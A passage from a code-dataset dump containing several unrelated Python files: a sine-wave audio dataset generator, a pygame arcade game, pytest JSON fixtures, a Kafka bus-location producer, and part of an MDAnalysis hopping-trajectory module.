data \n\ndef sample_param(param):\n\tindex = random.choice(range(len(param)))\n\treturn param[index]\n\ndef main():\n\targs = get_args()\n\tos.makedirs(args.out_dir, exist_ok=True)\n\tos.makedirs(args.wav_dir, exist_ok=True)\n\n\t# stores parameters <-> filename mapping\n\tmeta_file = os.path.join(args.out_dir, \"meta.csv\")\n\n\tparameters = {\"f1\": [100, 200, 400],\n\t\t\t\t \"a1\": [0.5, 0.7, 1.0],\n\t\t\t\t \"f2\": [800, 1200, 1600],\n\t\t\t\t \"a2\": [0.5, 0.7, 1.0]}\n\n\t# sample parameters\n\tparam_set = []\n\tfor i in range(args.size):\n\t\tnew_set = {k: sample_param(v) for k, v in parameters.items()}\n\t\t# print(new_set)\n\t\tparam_set.append(new_set)\n\n\tdataset = []\n\tfor i, param in enumerate(param_set):\n\t\td = {\"filename\": os.path.join(args.wav_dir, \"{:05d}.wav\".format(i))}\n\t\td.update(param)\n\t\tdataset.append(d)\n\t\tprint(\"generating example: {}\".format(d))\n\n\t\taudio = generate_sine(args.sample_rate, args.length, param)\n\t\twrite(d[\"filename\"], args.sample_rate, audio)\n\n\t#write the meta file\n\twith open(meta_file, 'w') as f:\n\t\t\twriter = csv.DictWriter(f, fieldnames=[\"id\", \"filename\", \"a1\", \"f1\", \"a2\", \"f2\"])\n\t\t\twriter.writeheader()\n\t\t\tfor i, d in enumerate(dataset):\n\t\t\t\td[\"id\"] = i\n\t\t\t\twriter.writerow(d)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"CandyDong/15622-term-project","sub_path":"generators/sine_generator.py","file_name":"sine_generator.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18747662238","text":"import pygame\r\nimport random\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((800,450))\r\ndef makeTextObjects(text,font):\r\n textSurface = font.render(text,True,(0,0,0))\r\n return textSurface, textSurface.get_rect()\r\ndef instructionMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (screen.get_width()/2,screen.get_height()/2)\r\n screen.blit(textSurf,textRect)\r\ndef killMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (50,20)\r\n screen.blit(textSurf,textRect)\r\ndef missMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (740,20)\r\n screen.blit(textSurf,textRect)\r\nclass Player(pygame.sprite.Sprite):\r\n rightImages = []\r\n leftImages = []\r\n punchRightImages = []\r\n punchLeftImages = []\r\n rightCounter = 1\r\n leftCounter = 1\r\n punchRightCounter = 1\r\n punchLeftCounter = 1\r\n direction = \"Right\"\r\n punching = False\r\n kills = 0\r\n miss = 0\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self,self.containers)\r\n self.image = self.rightImages[0]\r\n self.rect = self.image.get_rect()\r\n self.rect.x = 400\r\n self.rect.y = 390\r\n def update(self):\r\n keypress = pygame.key.get_pressed()\r\n self.punching = False\r\n if keypress[pygame.K_RIGHT]:\r\n self.rect.x += 5\r\n self.image = self.rightImages[self.rightCounter]\r\n self.rightCounter = (self.rightCounter + 1) % len(self.rightImages)\r\n self.direction = \"Right\"\r\n if keypress[pygame.K_LEFT]:\r\n self.rect.x -= 5\r\n self.image = self.leftImages[self.leftCounter]\r\n self.leftCounter = (self.leftCounter + 1) % len(self.leftImages)\r\n self.direction = \"Left\"\r\n if keypress[pygame.K_SPACE] and self.direction == 
\"Right\":\r\n self.image = self.punchRightImages[self.punchRightCounter]\r\n self.punchRightCounter = (self.punchRightCounter + 1) % len(self.punchRightImages)\r\n self.punching = True\r\n if keypress[pygame.K_SPACE] and self.direction == \"Left\":\r\n self.image = self.punchLeftImages[self.punchLeftCounter]\r\n self.punchLeftCounter = (self.punchLeftCounter + 1) % len(self.punchLeftImages)\r\n self.punching = True\r\nclass Obstacle(pygame.sprite.Sprite):\r\n direction = \"None\"\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self,self.containers)\r\n self.image = pygame.Surface((50,50))\r\n self.image = self.image.convert()\r\n self.image.fill((0,0,0))\r\n pygame.draw.rect(self.image,(0,255,0),(50,50,50,50))\r\n self.rect = self.image.get_rect()\r\n if random.randrange(0,2) % 2:\r\n self.direction = \"Right\"\r\n self.rect.y = 400\r\n self.rect.x = screen.get_height()+300\r\n else:\r\n self.direction = \"Left\"\r\n self.rect.y = 400\r\n self.rect.x = 0\r\n def update(self):\r\n if self.direction == \"Right\":\r\n self.rect.x -= 5\r\n if self.rect.x < 0:\r\n self.kill()\r\n else:\r\n self.rect.x += 5\r\n if self.rect.x > screen.get_width():\r\n self.kill()\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, image_file, location):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.image.load(image_file)\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\nPlayer.rightImages.append((pygame.image.load(\"agent1.png\")))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[0],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent2.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[1],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent3.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[2],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent4.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[3],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent5.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[4],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent6.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[5],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent7.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[6],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent8.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[7],True,False))\r\nPlayer.punchRightImages.append(pygame.image.load(\"agentpunch1.png\"))\r\nPlayer.punchLeftImages.append(pygame.transform.flip(Player.punchRightImages[0],True,False))\r\nPlayer.punchRightImages.append(pygame.image.load(\"agentpunch2.png\"))\r\nPlayer.punchLeftImages.append(pygame.transform.flip(Player.punchRightImages[1],True,False))\r\nclock = pygame.time.Clock()\r\nkeepGoing = True\r\nobstacles = pygame.sprite.Group()\r\nallSprite = pygame.sprite.RenderUpdates()\r\nPlayer.containers = allSprite\r\nObstacle.containers = allSprite, obstacles\r\nplayer = Player()\r\nbackground = Background(\"Summer.jpg\",[0,0])\r\nwhile keepGoing:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n keepGoing = False\r\n if random.randrange(0,100) < 2:\r\n obstacles.add(Obstacle())\r\n screen.fill((255,255,255))\r\n screen.blit(background.image,background.rect)\r\n 
instructionMessage(\"[Press Space to Punch][Left and Right Arrown Keys to Move]\")\r\n killMessage(\"Kills : \" + str(player.kills))\r\n missMessage(\"Miss : \" + str(player.miss))\r\n allSprite.update()\r\n allSprite.draw(screen)\r\n for obs in pygame.sprite.spritecollide(player,obstacles,0):\r\n if obs.direction == player.direction and player.punching:\r\n obs.kill()\r\n player.kills += 1\r\n else:\r\n obs.kill()\r\n player.miss += 1\r\n pygame.display.flip()\r\n clock.tick(30)\r\npygame.quit()\r\n\r\n\r\n","repo_name":"lloydescoto/Agent-Arcade","sub_path":"Arcade/FN-Arcade.py","file_name":"FN-Arcade.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6960173530","text":"import json\n\nimport pytest\n\n\n@pytest.fixture()\ndef read_method():\n with open('URL.json') as read_data:\n read_methoddata = json.load(read_data)\n return read_methoddata\n\n@pytest.fixture()\n\ndef readpostData():\n with open('postData.json','r') as read_data:\n read_methoddata = read_data.read()\n request_json=json.loads(read_methoddata)\n print(request_json)\n return request_json","repo_name":"nag14my3/APITesting","sub_path":"readConfigFile.py","file_name":"readConfigFile.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22281776170","text":"import json\nimport time\nimport itertools\n\nimport utils\nfrom kafka import producer\n\n\nclass Bus:\n def __init__(self, number: int, coordinates: itertools.cycle):\n self._producer = producer.Producer()\n self.number = number\n self.coordinates = coordinates\n\n def run(self) -> None:\n for coordinate in self.coordinates:\n self._producer.produce(json.dumps({\n \"bus_number\": self.number,\n \"key\": f\"{self.number}_{utils.generate_uuid()}\",\n \"latitude\": coordinate[1],\n \"longitude\": coordinate[0],\n }).encode('ascii'))\n time.sleep(1)\n\n\nif __name__ == '__main__':\n input_file = open('data/bus25.json')\n json_array = json.load(input_file)\n coordinates = itertools.cycle(\n json_array['features'][0]['geometry']['coordinates']\n )\n bus = Bus(25, coordinates)\n bus.run()\n","repo_name":"tamkovich/25BUS-FROM-HOME-TO-EPAM","sub_path":"bus.py","file_name":"bus.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11282196528","text":"from __future__ import absolute_import, with_statement\n\nimport warnings\n\nimport numpy\nimport MDAnalysis\nimport MDAnalysis.coordinates\nfrom MDAnalysis.lib.log import ProgressMeter\n\nfrom .exceptions import SelectionError\nfrom .constants import SITELABEL\nfrom . import utilities\nfrom .utilities import msg, set_verbosity\n\n\nimport logging\nlogger = logging.getLogger(\"MDAnalysis.app.hop.trajectory\")\n\nclass HoppingTrajectory(object):\n \"\"\"Provides a time-sequence of sites visited by individual molecules,\n called a 'hopping trajectory' because the molecules hop between\n sites. Their coordinates are mapped to site labels, which have been defined\n on a grid previously (using hop.sitemap).\n\n :Output format:\n\n For simplicity and code reusal this is again a dcd with the site as the\n x-coordinate; the y coordinate is set to the 'orbit site', i.e. it records\n the site the particle was last at for as long as it does not enter a new\n site. It describes the site in whose 'basin of attraction' the particle\n orbits. 
Note, however, that the transition to a new site is still counted\n as belonging to the previous site (which is arguably incorrect); the\n hop.graph module, however, does a proper analysis, which cannot be done\n here for efficiency reasons. The z field is unused at the moment and set to\n 0.\n\n :Attributes:\n\n ts MDAnalysis.Timestep object\n n_frames number of frames in hopping trajectory\n group AtomGroup of atoms that are tracked\n\n\n :Methods:\n\n ## [start:stop] object can be used as an iterator over the\n ## hopping trajectory (disabled due to problems when doing random\n ## access on large dcds; either a bug in DCDReader or python)\n next() advances time step in the hopping trajectory\n map_dcd() iterator that updates the ts and maps the trajectory\n coordinates to site labels\n _map_next_timestep() map next coordinate trajectory step to hopping time step\n _read_next_timestep() read next timestep from hopping trajectory\n\n\n write() write the hopping trajectory to a dcd file + psf\n write_psf() write a dummy psf for visualization\n \"\"\"\n\n def __init__(self,trajectory=None,group=None,density=None,\n filename=None,hopdcd=None,hoppsf=None,fixtrajectory=None,verbosity=3):\n \"\"\"Converts a trajectory into a hopping trajectory, using a sitemap as an index for sites.\n\n >>> h = HoppingTrajectory(trajectory=DCDReader,group=AtomGroup,density=Density,\n fixtrajectory=<dict>,verbosity=3)\n >>> h = HoppingTrajectory(filename=<name>)\n\n Create from a coordinate trajectory of a group of atoms and a site map:\n\n u = MDAnalysis.Universe(psf,dcd)\n water = u.select_atoms('name OH2')\n h = HoppingTrajectory(trajectory=u.trajectory,group=water,density=water_density)\n\n Load from a saved hopping trajectory (in dcd format with dummy psf)\n\n h = HoppingTrajectory(hopdcd='hops.trajectory',hoppsf='hops.psf')\n\n :Arguments:\n\n trajectory MDAnalysis.trajectory trajectory instance\n group MDAnalysis.group instance\n density grid3Dc.Grid instance with sitemap set\n\n hopdcd dcd written by write()\n hoppsf psf written by write() (or write_psf())\n filename or simply provide one filename prefix for psf and dcd\n\n fixtrajectory dictionary with attributes of a dcd object and new\n values; used to provide correct values after using\n a catdcd-generated trajectory (hack!), e.g.\n fixtrajectory = {'delta':10.22741474887299}\n\n verbosity show status messages for >= 3\n \"\"\"\n self.verbosity = verbosity\n set_verbosity(self.verbosity)\n\n if not (trajectory is None or group is None or density is None):\n self.traj = trajectory # MDAnalysis.Universe.trajectory\n try:\n self.tgroup = group.atoms # atom selection for trajectory\n except AttributeError:\n raise TypeError('group must be an <AtomGroup>, e.g. MDAnalysis.Universe.select_atoms().')\n if len(self.tgroup) == 0:\n raise ValueError(\"Group contains 0 particles, should be >0\")\n\n # for writing a pseudo PSF we want atom attributes: mass, type, charge\n u = self.tgroup.universe\n if not hasattr(self.tgroup, \"charges\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Charges(numpy.zeros(len(u.atoms))))\n if not hasattr(self.tgroup, \"masses\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Masses(numpy.ones(len(u.atoms))))\n if not hasattr(self.tgroup, \"types\"):\n u.add_TopologyAttr(\n MDAnalysis.core.topologyattrs.Types(numpy.array(['O'] * len(u.atoms))))\n\n if isinstance(fixtrajectory,dict):\n for attr,val in fixtrajectory.items():\n if not hasattr(trajectory,attr):\n raise AttributeError('fixtrajectory: dcd object does not have attribute \"'\\\n 
+str(attr)+'\"')\n trajectory.__dict__[attr] = val\n self.totaltime = trajectory.totaltime\n self.traj.rewind() # make sure to start from frame 0\n self._GD = density # sitemap.Density object\n self.map = self._GD.map # map of sites\n self.edges = self._GD.edges # N+1 edges of bins\n self.dedges = map(numpy.diff,self.edges) # N bin widths\n try:\n if not self._GD.grid.shape == self.map.shape:\n raise ValueError\n except (AttributeError,ValueError):\n raise ValueError(\"The density object must have its site map computed.\")\n Dmap = numpy.ndim(self.map)\n coord = numpy.asarray(self.tgroup.positions)\n Natoms,D = coord.shape\n if not D == Dmap:\n raise ValueError(\"Coordinates and map have different dimensions.\")\n # NOTE:\n # Any count outside the histogram becomes 'outlier' so\n # one should take care to choose a large enough map for the region\n # of interest. See _coord2hop().\n self.buffered_map = SITELABEL['outlier'] * \\\n numpy.ones(tuple(numpy.asarray(self.map.shape) + 2))\n\n # Here we commit to writing a DCD hopping trajectory:\n self._ts = MDAnalysis.coordinates.base.Timestep(Natoms) # empty time step for N atoms\n self._ts.frame = self.traj.ts.frame # current frame\n numlabels = float(self.map.max() - self.map.min() + 2) # naive... but not crucial\n # fake unit cell for visualization\n self._ts.dimensions = [numlabels, numlabels, 1, 90, 90, 90]\n # access self.ts through managed property\n # current hopping trajectory frame is in ts._pos[]\n # _pos = numpy.empty(coord.shape) # x=site label y=s(t)==0?s(t-1):s(t) z=0\n self.n_frames = self.traj.n_frames # total numer of frames\n self.hoptraj = None # no hopping trajectory available\n self._init_coord2hop() # init for _map_next_timestep()\n self._map_next_timestep() # initialize with first timestep\n elif not (hopdcd is None or hoppsf is None) or filename is not None:\n # read from dcd\n try:\n self.traj,self.tgroup,self.map,self.edges,self.dedges\n except AttributeError:\n self.traj,self.tgroup,self.map,self.edges,self.dedges = [None] * 5\n if filename is not None:\n hoppsf = self.filename(filename,'psf')\n hopdcd = self.filename(filename,'dcd')\n u = MDAnalysis.Universe(hoppsf,hopdcd)\n group = u.atoms\n if u.atoms.n_atoms == 0:\n raise ValueError(\"Hop trajectory contains 0 particles.\")\n self.group = group # group that refers to hopping trajectory\n self.hoptraj = u.trajectory # DCD(!) trajectory object\n # use property self.ts to access self.hoptraj.ts\n self.n_frames = self.hoptraj.n_frames\n self.totaltime = self.hoptraj.totaltime\n else:\n raise ValueError('Not sufficient data to create a hopping trajectory.')\n\n filename = utilities.filename_function\n\n @property\n def ts(self):\n \"\"\"Timestep of the hoptraj\"\"\"\n if self.hoptraj:\n return self.hoptraj.ts\n else:\n return self._ts\n\n @ts.setter\n def ts(self, x):\n if self.hoptraj:\n raise AttributeError(\"Cannot modify the loaded hoptraj.ts\")\n else:\n self._ts = x\n\n def next(self):\n \"\"\"Provides the next time step of a hopping trajectory.\n\n ts = next()\n\n If a hopping trajectory file exists then this is\n used. 
Otherwise, the coordinate trajectory is mapped on the\n fly (which is computationally more expensive).\n \"\"\"\n if self.hoptraj:\n nextTS = self._read_next_timestep\n else:\n nextTS = self._map_next_timestep\n return nextTS()\n\n def _map_next_timestep(self):\n \"\"\"Read next timestep from coordinate trajectory and set up the\n hopping trajectory time step\n \"\"\"\n return self._coord2hop(self.traj.next())\n\n def _read_next_timestep(self):\n \"\"\"Read next time step from hopping trajectory\"\"\"\n return self.hoptraj.next()\n\n def write(self,filename,start=None,step=None,delta=None,load=True):\n \"\"\"Write hopping trajectory as standard dcd file, together with a minimal psf.\n\n write('hop')\n\n Arguments:\n\n load = True Immediately loads the trajectory so that further\n calls to next() will use the computed\n trajectory and don't use expensive mapping.\n\n Ignore the other options and leave them at the\n defaults. Currently, only the whole trajectory is written. For\n visualization one also needs the dummy psf of the group.\n\n Results:\n\n filename.trajectory and filename.psf\n\n Note that it is your responsibility to load the hopping\n trajectory and the appropriate psf together as there is very\n limited information stored in the dcd itself.\n \"\"\"\n set_verbosity(self.verbosity) # this is stupid\n\n psfname = self.filename(filename,'psf')\n dcdname = self.filename(filename,'dcd')\n\n pm = ProgressMeter(self.n_frames, interval=10,\n format=\"Mapping frame %(step)5d/%(numsteps)6d [%(percentage)5.1f%%]\\r\")\n with MDAnalysis.Writer(dcdname, n_atoms=self.ts.n_atoms,\n dt=self.traj.dt,\n remarks='Hopping trajectory: x=site y=orbit_site z=0') as dcdwriter:\n for ts in self.map_dcd():\n dcdwriter.write_next_timestep(ts)\n pm.echo(ts.frame)\n logger.info(\"HoppingTrajectory.write(): wrote hoptraj %r.\", dcdname)\n\n self.write_psf(psfname)\n logger.info(\"HoppingTrajectory.write(): wrote hoppsf %r.\", psfname)\n\n if load is True:\n self.__init__(filename=filename,verbosity=self.verbosity)\n\n def write_psf(self,filename):\n \"\"\"Write a dummy psf just for the atoms in the selected group\n so that one can visualize the hopping trajectory.\n\n write_psf(filename)\n\n The psf is NOT a fully functional psf. It only contains the\n header and the ATOMS section. 
It is sufficient to display the\n hopping trajectory in VMD and can be read in by the MDAnalysis\n tools in order to store the atom numbers for the hopping\n trajectory.\n\n ------\n notes\n ------\n Format from psffres.src\n\n CHEQ:\n II,LSEGID,LRESID,LRES,TYPE(I),IAC(I),CG(I),AMASS(I),IMOVE(I),ECH(I),EHA(I)\n\n standard format:\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,I4,1X,2G14.6,I8,2G14.6)\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,A4,1X,2G14.6,I8,2G14.6) XPLOR\n expanded format EXT:\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8,2G14.6)\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,A4,1X,2G14.6,I8,2G14.6) XPLOR\n\n no CHEQ:\n II,LSEGID,LRESID,LRES,TYPE(I),IAC(I),CG(I),AMASS(I),IMOVE(I)\n\n standard format:\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,I4,1X,2G14.6,I8)\n (I8,1X,A4,1X,A4,1X,A4,1X,A4,1X,A4,1X,2G14.6,I8) XPLOR\n expanded format EXT:\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8)\n (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,A4,1X,2G14.6,I8) XPLOR\n \"\"\"\n # Standard no CHEQ format:\n psf_ATOM_format = '%(iatom)8d %(segid)4s %(resid)-4d %(resname)4s '+\\\n '%(name)-4s %(type)4s %(charge)-14.6f%(mass)-14.4f%(imove)8d\\n'\n # This produces:\n # 2114 XWAT 1 TIP3 OH2 75 -0.834000 15.9994 0\n # For some reason, I don't get the same output as I get from Charmm because\n # Charmm centers the value whereas I can only left or right-align them.\n # (This is not a problem as the fields are properly lined up!)\n # 2114 XWAT 1 TIP3 OH2 75 -0.834000 15.9994 0\n\n # EXT (no CHEQ) format (read by MDAnalysis.topology.PSFParser)\n #expanded format EXT:\n # (I10,1X,A8,1X,A8,1X,A8,1X,A8,1X,I4,1X,2G14.6,I8) charmm\n # II SEGID RESID RESNM ANAME TYPE CHARGE MASS IMOVE\n\n psf_EXT_ATOM_format = \\\n '%(iatom)10d %(segid)8s %(resid)-8d %(resname)8s ' \\\n '%(name)-8s %(type)4s %(charge)-14.6f%(mass)-14.4f%(imove)8d\\n'\n\n with open(filename,'w') as psf:\n psf.write('PSF EXT\\n\\n')\n psf.write('%7d !NTITLE\\n' % 3)\n psf.write('* Hopping trajectory written by hop.trajectory.HoppingTrajectory.write()\\n'\n '* See https://github.com/Becksteinlab/hop\\n'\n '* This is NOT a fully functional psf but should work for visualization.\\n')\n psf.write('\\n')\n\n psf.write('%10d !NATOM\\n' % len(self.tgroup))\n imove = 0 # no fixed atoms\n for atom in self.tgroup:\n # add +1 to atom.number (zero-index but Charmm is 1-indexed) (see PSFParser.py)\n psf.write(psf_EXT_ATOM_format %\n {'iatom':atom.index+1, 'segid':atom.segid[:8], 'resid':atom.resid,\n 'resname':atom.resname[:8], 'name':atom.name[:8], 'type':atom.type,\n 'charge':atom.charge, 'mass':atom.mass,'imove':imove} )\n # emergency stop if we cannot handle the size of the system\n if atom.resid >= 10**8 or atom.index+1 >= 10**10:\n raise NotImplementedError(\"Sorry, too many atoms (%d) or resids (%d) for the standard \"\n \"PSF format. 
File a bug at http://github.com/Becksteinlab/hop/issues\"\n % (atom.index+1, atom.resid))\n # ignore all the other sections (enough for MDAnalysis, VMD, and me)\n\n\n def map_dcd(self, start=None, stop=None, step=None):\n \"\"\"Generator to read the trajectory from start to stop and map\n positions to sites.\n\n ts = map_dcd(**kwargs)\n\n Arguments:\n start starting frame number (None means first)\n stop last frame to read (exclusive) (None means last)\n (Those are arguments to dcd[start:stop].)\n Iterator Returns:\n ts hopping trajectory timestep object (iterator)\n \"\"\"\n self._init_coord2hop()\n for traj_ts in self.traj[start:stop:step]:\n yield self._coord2hop(traj_ts)\n\n def _init_coord2hop(self):\n \"\"\"Allocate helper arrays for _coord2hop()\"\"\"\n # initialization with 'interstitial' is CRUCIAL: throws away first frame\n # and makes sure that we don't keep spurious sites from 1st frame around\n self._sites_last = SITELABEL['interstitial'] * numpy.ones(self.tgroup.n_atoms)\n self._offsites = numpy.empty(self.tgroup.n_atoms,dtype=bool)\n\n def _coord2hop(self,ts):\n \"\"\"Translate a single trajectory coordinate frame into a hopping\n trajectory frame and updates the hopping trajectory frame.\n\n :Arguments:\n ts\n :class:`~MDAnalysis.coordinates.base.Timestep` time step object (input coordinate data)\n\n :Returns: hopping ts; Timestep object for the _selected_ atoms with (x=sites y=orbit site z=0)\n (also updates self.ts so that the HoppingTrajectory instance is uptodate.)\n \"\"\"\n self.ts.frame = ts.frame # update the hopping time step\n coords = numpy.asarray(self.tgroup.positions)\n N,D = coords.shape\n\n # Basic nD histograming code from numpy.histogramdd:\n #\n # digitize returns i such that bins[i-1] <= x < bins[i]\n # outliers: i=0 or i=len(bins).\n #\n # indices[] are NOT map[] indices: to remove the two outlier\n # bins (in the logic of digitize()) we would have to subtract\n # 1 later and also remove indices belonging to outliers. 
We\n # cheat and add outlier bins to the map (buffered_map[]) and\n # simply label outliers in the trajectory.\n indices = [numpy.digitize(coords[:,i], self.edges[i]) for i in xrange(D)]\n\n # Using digitize, values that fall on an edge are put in the right bin.\n # For the rightmost bin, we want values equal to the right\n # edge to be counted in the last bin, and not as an outlier.\n for i in xrange(D):\n # Rounding precision\n decimal = int(-numpy.log10(self.dedges[i].min())) +6\n # Find which points are on the rightmost edge.\n on_edge = numpy.where(\n numpy.around(coords[:,i], decimal) == \\\n numpy.around(self.edges[i][-1], decimal))[0]\n # Shift these points one bin to the left.\n indices[i][on_edge] -= 1\n\n # indices contains the outliers at index 0 and len(edges[i])\n # To make things simpler, we expand the map with a outlier zone,\n # label outliers with -1 and then index into the buffered_map\n\n # fill the core of the buffered map\n core = D*[slice(1,-1)]\n self.buffered_map[core] = self.map # not very expensive\n\n # Note that now indices[m] corresponds to group[m]\n # (It's important that the order is preserved)\n # The group is not needed right now, though.\n #\n # pos[:,0] = site(t), pos[:,1] = orbit site, pos[:,2] = 0 (unused)\n pos = self.ts._pos # assign slices to avoid loop (thanks to Naveen)\n pos[:,0] = [self.buffered_map[indices[0][iatom],indices[1][iatom],indices[2][iatom]] \\\n for iatom in xrange(N)]\n s = pos[:,0]\n self._offsites[:] = (s == SITELABEL['interstitial']) | (s == SITELABEL['outlier'])\n pos[:,1] = s # particles in interstital and outliers are assigned their previous site\n pos[self._offsites,1] = self._sites_last[self._offsites]\n pos[:,2] = 0\n\n # _sites_last[] was initialized to 'interstitial': this ensures proper accounting\n # for all later steps (because 'interstitial' is thrown away at the analysis stage)\n self._sites_last[:] = pos[:,1] # save orbit sites for next step\n return self.ts\n\n def iterator(self):\n return self.__iter__()\n\n def __iter__(self):\n if self.hoptraj:\n for ts in self.hoptraj:\n yield ts\n else:\n self._init_coord2hop()\n for traj_ts in self.traj:\n yield self._coord2hop(traj_ts)\n\nclass TAPtrajectory(object):\n \"\"\"Provides a Time-Averaged Position (TAP) version of the input trajectory.\n\n The method is described in Henchman and McCammon, J Comp Chem 23\n (2002), 861 doi:10.1002/jcc.10074\n\n :Attributes:\n ts MDAnalysis.Timestep object\n n_frames number of frames in TAP trajectory\n group AtomGroup of atoms that are tracked\n\n\n :Methods:\n\n ## [start:stop] object can be used as an iterator over the\n ## hopping trajectory (disabled due to dcdreader bug)\n next() advances time step in the hopping trajectory\n map_dcd() iterator that updates the ts and maps the trajectory\n coordinates to site labels\n _map_next_timestep() map next coordinate trajectory step to hopping time step\n _read_next_timestep() read next timestep from hopping trajectory\n\n write() write the hopping trajectory to a dcd file + psf\n \"\"\"\n\n def __init__(self,trajectory=None,group=None,TAPradius=2.8,TAPsteps=3,\n filename=None,dcd=None,psf=None,fixtrajectory=None,verbosity=3):\n \"\"\"A TAP trajectory object converts a trajectory into a TAP trajectory.\n\n Create from a coordinate trajectory of a group of water residues:\n\n u = MDAnalysis.Universe(psf,dcd)\n water = u.select_atoms('resname TIP*') # see NOTE below!!\n water = u.select_atoms('name OH2') # better, see NOTE below!!\n h = 
TAPtrajectory(trajectory=u.trajectory,group=water)\n\n Load from a saved hopping trajectory (in dcd format with dummy psf)\n\n h = TAPtrajectory(dcd='TAP.trajectory',psf='TAP.psf')\n\n The given atom group is filtered according to the Time-Averaged Position\n algorithm (Henchman and McCammon, J Comp Chem 23 (2002), 861). Original\n positions are replaced by their TAPs: A particle's last position (TAP)\n is retained unless it has moved farther than TAPradius from its TAP,\n measured by its root mean square distance over the last TAPsteps\n frames.\n\n One can use a TAP filtered trajectory 'on-the-fly' to build the density:\n\n u = Universe(psf,dcd)\n oxy = u.select_atoms('name OH2')\n TAP = TAPtrajectory(u.trajectory,oxy)\n u.trajectory = TAP.trajectory # <--- replace orig dcd with TAP !!\n dens = hop.density.density_from_Universe(u,atomselection='name OH2')\n\n NOTE: In the current implementation residues are often ripped apart\n because all coordinates are processed independently. It is recommended\n to only do TAP on the water oxygens (for speed). This will create a\n trajectory in which hydrogens are always ripped from the oxygen but\n this trajectory is ONLY being used for creating a density from those\n oxygens using hop.sitemap.build_density().\n\n (This could be fixed at the cost of speed; in this case TAP would be done\n on the centre of mass and the whole residue would be translated.)\n\n :Arguments:\n\n trajectory MDAnalysis.trajectory trajectory instance\n group MDAnalysis.group instance (from the same Universe as trajectory)\n TAPradius particles are considered to be on the TAP as long as they\n haven't moved farther than TAPradius over the last TAPsteps frames\n TAPsteps RMS distance of particle from TAP over TAPsteps is compared\n to TAPradius\n dcd dcd written by write()\n psf psf written by write() (or write_psf())\n filename or simply provide one filename prefix for psf and dcd\n\n fixtrajectory dictionary with attributes of a dcd object and new\n values; used to provide correct values after using\n a catdcd-generated trajectory (hack!), e.g.\n fixtrajectory = {'delta':10.22741474887299}\n\n verbosity show status messages for >= 3\n \"\"\"\n self.verbosity = verbosity\n set_verbosity(self.verbosity)\n\n if not (trajectory is None or group is None):\n self.traj = trajectory # MDAnalysis.Universe.trajectory\n self.tgroup = group # atom selection for trajectory\n self.tgroup_indices = self.tgroup.indices() # cache indices\n if not isinstance(self.tgroup,MDAnalysis.core.AtomGroup.AtomGroup):\n raise TypeError('group must be an <AtomGroup>, e.g. MDAnalysis.Universe.select_atoms().')\n self.universe = self.tgroup.atoms[0].universe # Universe of dcd and group (hackish..)\n if isinstance(fixtrajectory,dict):\n for attr,val in fixtrajectory.items():\n if not hasattr(trajectory,attr):\n raise AttributeError('fixtrajectory: dcd object does not have attribute \"'\\\n +str(attr)+'\"')\n trajectory.__dict__[attr] = val\n self.totaltime = trajectory.totaltime\n self.traj.rewind() # make sure to start from frame 0\n self.ts = self.traj.ts # output will look like input (no copy, see _coord2TAP!)\n self.TAPtraj = None # no TAP trajectory available\n self.TAPradius = TAPradius\n self.TAPsteps = TAPsteps\n # store last TAPsteps in __lastframes\n self.__lastframes = utilities.Ringbuffer(self.TAPsteps)\n # store the last TAP coordinates: initialized here\n self.__currentTAP = self.tgroup.positions.copy()\n # fake DCD object that can be slotted into another universe\n self.dcd_attributes = {}\n for k in 
